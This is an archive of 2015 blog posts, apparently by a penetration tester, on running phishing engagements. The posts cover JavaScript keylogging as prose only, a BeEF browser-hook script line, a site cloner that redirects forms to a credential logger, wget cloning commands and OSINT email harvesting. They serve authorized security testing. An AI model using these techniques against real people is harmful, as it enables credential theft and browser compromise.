Mastodon Hillbilly StoryTime: 2015

Thursday, April 9, 2015

New Script/Tool: KeyLogging in JavaScript

So, you want to set up a keylogger within a website.  Ultimately it is fairly simple.  there are 2 items you will need.  First will be a way to log the keystrokes and second would be a way to capture the keystrokes.

For the logging of the key strokes, the simplest way would be with a small script similar to the following one.  This script accepts any GET or POST parameter and then logs it to the specified file.  Of course with this, it is assumed that you have a place to host this script and that the script has the proper permissions to create and write to the file.

It should be noted that I have used a version of that logging script for numerous situations, mostly for social engineering.  It works well for credential harvesting websites.  It also is useful as a simple data exfiltration script.

With that taken care of, now we need to build a way to capture the key strokes.  One of the simplest ways to go about this is demonstrated in the following code sample.  This code when included within a webpage (with the proper surrounding "script" tags) will capture every key pressed (as long as it is a printable character) and then send it off to a secondary logging script.

The previous simple key capture script has a few limitations.  The primary one is that it only captures printable characters.  Thus, key presses like [Backspace], [tab], [enter], [arrow keys], and so on will not be captured.  To account for these missing keys, it is important to not only listen for "onkeypress" but also for "onkeydown".  The following code takes this into account to provide a much more complete key capturing script.

Hopefully, you will find these scripts of use.  As always, if you have any questions/comments/criticisms, please feel free to let me know.

Monday, April 6, 2015

New Script/Tool: BeEF Restful API in python

The BeEF (Browser Exploitation Framework) Project is a penetration tool that is focused on attacking and exploiting web browsers.  You can find out more information about the BeEF project at their website as well as on their GitHub page.

How about a little more information on the tool? (not all inclusive, just some high points)
  • BeEF is written in Ruby.
  • It is bundled as part of the Kali Linux Penetration Testing Distro by default.
  • It has a large number of modules which can help in pulling information from, attacking, and exploiting a wide number of web browsers.
  • If properly configured, an attacker can launch Metasploit payloads directly from within BeEF.
  • BeEF has a RESTFUL API.
  • In order to make use of BeEF, an attacker only needs to start up BeEF and add 1 simple line of HTML to the target website.

It is these two items which makes it of particular interest during a phishing exercise/engagement.  The fact that all an attacker needs to do is add one HTML line (see below) to a website to make it work with BeEF is amazing.
<script type=text/javascript src=></script>
Combine this with the ability to control, monitor, and pull data from BeEF using its RESTFUL API, and you have a very powerful tool for automating various aspects of a phishing exercise/engagement.

Unfortunately I could not find an implementation of the BeEF RESTFUL API for python that I was happy with.  That is why I wrote my own BeEF RESTFUL API  python module.  It can be found on GitHub at  It does not incorporate all of the possible functions that the BeEF RESTFUL API allows for, but it does incorporate all of the ones I found useful.

Please take a look and use it if you find it useful.  If you have comments/criticisms/etc with the code, please feel free to let me know.

Friday, April 3, 2015

New Script/Tool:

As mentioned in an earlier post, I decided to write my own site cloner tool for use in my phishing exercise/engagements.  I needed a tool that would complete (or as close as I could get) clone any given site and then update any forms with links to a data collection script that I specify.

The current version of the "Site Cloner" tool is hosted on GitHub at

In order to run the script, simply execute:
python <URL> <outdirectory> (optional <form action>)
      <URL> = the full URL of the page to be cloned
      <outdirectory> = where do you want the files to be saved to
      <form action> = the script to execute when someone submits a form
An example would be:
python "" "safelogin" log.php
This command line would execute "" on the URL "", save all files into the directory located at "./safelogin" and finally rewrite all forms to submit to a script called "log.php".  Someone will have to create that script (log.php) later and stored in the same directory.

When the script is run, you will see verbose output similar to the following:

In this output you can see each page, link, file, and form that the script identifies and what it does with it.  Some files (binary formats such as images) are simply downloaded, where as html documents will be processed for additional links and forms.  Anytime a form is encountered, the "form tag" is rewritten.
FOUND A FORM                [<form class="form-horizontal" action="/create.php" method="GET">]
REWROTE FORM TO BE  [<form method="get" action="log.php" class="form-horizontal">]
As is shown in the above example, the form action was changed from being "/create.php" to being "log.php".  By doing this automatically, it saves time and effort by not requiring the user to go back, find, and edit all of the forms them selves.

Below is an example of what "log.php" could look like:

I hope this script is of use to you.  As always, if you have any comments/criticisms,etc, please leave a comment below.

Thursday, April 2, 2015

Phishing 101: Cloning a Site

Many phishing exercises/engagements require both the sending of a malicious email as well as the presence of a malicious website/web server. This is definitely the case where the goal is to collect credentials or to exploit the user's web browser.

Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.

Browser Exploitation

First you could create a dummy site that just has some malicious code in it and the site does not really need to display anything to the user.  This is common with browser attacks.  One example of this is when using the BeEF (Browser Exploitation Framework) project.

The BeEF Project is a penetration tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their website as well as on their GitHub page.

If you take this approach, BeEF makes it very easy in that once you have BeEF running, you can create a web page that contains a line similar to:
<script type=text/javascript src=></script>
You would want to replace the "" with the IP of the Internet facing system that BeEF is running on.  Then send an email to the target instructing them to visit the web site that you inserted that line into and then you should have a successfully compromised web browser, once the target visits the malicious website.

Information/Credential Harvesting

Now for the second type of malicious website.  This type is a web site that looks as close to 100% valid as possible and will likely be used to capture credentials or other important information such as username, password, RSA token, etc...

To make such a site, you can:
  • use "wget" to clone an existing site, then edit it
  • make it entirely by hand
  • use a tool that is designed for site cloning to dedicated tool and then edit the results

If you wish to use "wget" to clone a site, the following options will come in handy.
  • perform full clone:
    • wget -m -p -k <URL>
      • -m = Mirroring : This option turns on recursion and time-stamping, sets infinite recursion depth.
      • -p = Page Requisites : This option causes wget to download all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.
  • only clone X levels deep:
    • wget -r -l 1 -p -k 
      • -r = Enable recursion
      • -l X = Limit recursion to X levels deep
      • -p = Page Requisites : This option downloads all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.

You may ask why you would not always want to just do a full clone.  Well, if you are just wanting to capture the values entered into a particular form, you will only need to clone that page and you would not need the rest of the site.

Now that you have cloned the site (or as much of it as you need to), you will need to edit the html and make any necessary changes to the forms that you need in order to capture the credentials.  This is also the time where you would make any other edits you desire. When editing forms, it is useful to have a secondary script handy that can be used as the "action" for the form. The code sample below is a simple php script that will log all GET and POST parameters passed to it.

When creating a web site by hand, you can get a bit of a head start by opening the page you want to clone and then "view source", select it all and copy paste it into a new html document. Then as before, you will need to make any necessary changes to the html that are needed.

There are a few tools available to help such as HTTrack. According to the website,
[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
Again as before, you will need to make any necessary changes to the html that are needed.

Finally, I would like to mention a script I wrote that can be used to help with cloning a site and automatically making any necessary edits to the contained forms.  The script can be found at  I will be releasing a new blog post describing the details of this script in the next few days.

Wednesday, April 1, 2015

New Script/Tool: Email Address Finder

While performing various phishing exercises/engagements, I found myself having to identify list of potential email addresses on a regular basis.  Tools like "theHarvester" make this task easier, however, theHarvester does not just find email addresses.  It also finds associated host names and while it does search a large number of search engines, it did not search all of the ones I thought it should.

As a result, I ended up writing my own minimal script to search for email addresses across all of the search engines I could think of at the time.  The tool currently searches for email address from 8 different search engine sources:

  • google
  • bing
  • ask
  • dogpile
  • yandex
  • baidu
  • yahoo
  • duckduckgo
simply run:
python <target domain>
and it will start querying each of the above listed search engines for records that match
@<target domain>
and then parse the resulting output for strings that match the email regex of
[a-zA-Z0-9\.\-_]+@[a-zA-Z0-9\.\-]* + <target domain>
Once the regex has been applied, all of the identified email address are added to a list, and uniqued to produce the final list of identified potential email addresses.

I fully admit that this code is not new or unique, but I wrote it to suit my needs and if you find it useful as well, then please let me know.  If you have suggested improvements, find errors, etc, please let me know as well.

You can find this code located at:

Tuesday, March 31, 2015

Phishing 101: Target Identification / OSINT

When a new Phishing exercise/engagement is began, among the first items that will need to be collected is a list of target email addresses.  This is typically handled in one of two ways (or in some cases, a combination of them).

  1. The customer provides a list of email address that is to be targeted.  All phishing emails MUST be sent to one of the email address in the list.
  2. The attacker (you) must do your own research to identify potential email targets.

As the first way (customer provides the target list) is a bit boring to discuss here, we will be focusing on the second; finding your own targets.  This type of internet recon is typically referred to as OSINT (Open Source Intelligence).  As I covered a bit of OSINT in a previous post, I will review it here and add additional information as needed.

In your attempts to identify potential email targets for the phishing exercise/engagement, you will find that there are many resources (websites and tools) that can aid you in your research/intelligence gathering.  Some of the common website I find useful for identifying email addresses are:
Google, Bing, and other search engines can be a great asset in identifying email addresses.  Simply by searching for "@<>" you should get a list of links that each contain an email address in the displayed description.  Then by simply copy-n-pasting the email addresses into a targets file, you can start building your list.  Please not that tools like "theHarvester" mentioned later can do this for you.

Social media sites are ripe with useful information.  Most of them have a way to search for people who say they work for a particular company.  Thus, by searching for "employees of <target company>" you should be presented with a list of potential employees.  Unfortunately, most social media sites do not display the email addresses.  However, they do usually display their first and last names.  Now, if you have been able to identify a few (or at least 1) valid email address, you should know the email address format.  Common email formats are: (fn=first name, fi=first initial, ln=lastname)

  • [fi][ln]
  • [fn].[ln]
  • [fn]_[ln]

By using this knowledge, and the list of first and last names you collected, you should be able to convert them into likely email addresses.  Again, it should be noted that the tool Recon-NG has the ability to semi-automate this process of searching social media sites, identifying reported employees, and mangling their names into potential email addresses.

Additionally, some of the common tools I typically employ in OSINT are:
"whois" is just a command line tool that allows you to look up information on a particular domain name.  Many times, this information will contain a few email addresses, names, and phone numbers.  All of which can be useful during the phishing exercise/engagement.

As mentioned before, "theHarvester" is a command line Linux tool that can perform various searches against common search engines, to identify email addresses and host names associated with a target domain name.

Again, as mentioned earlier, "Recon-NG" is a command line Linux tool, that can perform various searching using a multitude of online tools to identify potential employees of a company, identify potentially leaked passwords, generate potential target email address lists, and many other bits of useful information.

"Foca" is a windows binary that can search a given target website for any available documents (office docs, pdfs, etc) and then extracts the "metadata" from the documents to identify interesting information such as:

  • usernames
  • machine names
  • installed software
It should be noted that Foca is a commercial product, but does have a limited/free version available.

"Maltego" is sort of a "catch all" tool for OSINT.  Maltego can perform numerous "transforms" on entered and gathered data to identify associated data from numerous online sources.  For example, given a company name, it can identify potential email addresses.  From those email addresses, it can attempt to idenify the associate People (first name and last name) as well as any online accounts that have the associated email address.  And so on.  It should be noted that Maltego is a commercial product, but does have a limited/free version available.

By no means, is the lists above provided as all inclusive.  These are just some of the tools I find myself using on a regular basis.  new tools are being developed all of the time as well as improvements being made to the older tools.

In future blog posts, I may go into more detailed reviews of some of the mentioned tools, but for now, just know they exist and go, download them, and try them out.

As always, all comments/questions/criticisms are welcomed.

Friday, March 27, 2015

Phishing 101: An Intro

If you search on the internet or attend pretty much any security conference, you will find a plethora of information on what "phishing" is and how to perform it.  As such, this post (and the following ones in the series) will just cover the high points and provide useful references on where you can find more in-depth information.

At its core, phishing is the sending of an email to a target with the intent of having the target perform some action which will lead to the attacker gaining some new piece of information or access.

The statement is a bit vague, and it is meant to be so.  That is because phishing can take many forms with many different desired outcomes.  The typical outcomes are:
  • harvesting credentials from a target, typically via a credential harvesting website
  • compromise of the target's web browser via a drive by browser attack or a malicious java payload
  • compromise of a target's system typically via a malicious attachment
For the purposes of this blog post and the following ones, we will be discussing phishing primarily from the perspective of a contractually/legally authorized phishing exercise/engagement.

For most phishing exercises/engagements, the following 4 steps will occur:
  1. Target identification via
    1. the customer providing the target list
    2. the attacker performing Open Source Intelligence Gathering (OSINT)
  2. One or more websites are designed and made active.
    1. Two possible site types are:
      1. credential harvesting
      2. browser exploit
  3. The attacker will craft and then send the phishing emails to the target email addresses.
    1. These emails could be nothing more than a simple template containing a url to one of the previously designed websites, or it could contain a malicious attachment.
  4. As the exercise/engagement progresses, the attacker will monitor the results and use them to ultimately create a report for the customer.
Each of these steps will be discussed in more detail in future blog posts.